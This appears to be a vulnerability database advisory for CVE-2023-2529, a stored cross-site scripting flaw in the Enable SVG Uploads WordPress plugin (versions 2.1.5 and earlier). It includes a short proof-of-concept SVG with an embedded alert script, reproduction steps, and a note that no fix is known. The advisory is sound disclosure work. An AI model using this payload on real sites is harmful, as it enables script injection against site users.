Enable SVG Uploads <= 2.1.5 – Author+ Stored XSS via SVG | CVE 2023-2529 | Plugin Vulnerabilities

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

1. Upload a malicious SVG: <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> alert("XSS Test"); </script> </svg>

2. Add to post and view SVG to see XSS.

Affects Plugins

enable-svg-uploads

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Mateus Machado Tesser

Submitter

Mateus Machado Tesser

Verified

Yes

WPVDB ID

4ac03907-2373-48f0-bca1-8f7073c06b18

Timeline

Publicly Published

2023-06-19 (about 2 years ago)

Added

2023-06-19 (about 2 years ago)

Last Updated

2023-06-19 (about 2 years ago)

Other

Published

Title

Published

2015-06-24

Title

Nextend Twitter Connect <= 1.5.1 - Reflected Cross-Site Scripting (XSS)

Published

2024-04-12

Title

MWW Disclaimer Buttons < 3.2 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2022-07-26

Title

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

Published

2022-08-25

Title

Launcher: Coming Soon & Maintenance Mode <= 1.0.11 - Admin+ Stored XSS

Published

2025-03-26

Title

TablePress < 3.1 - Author+ Stored XSS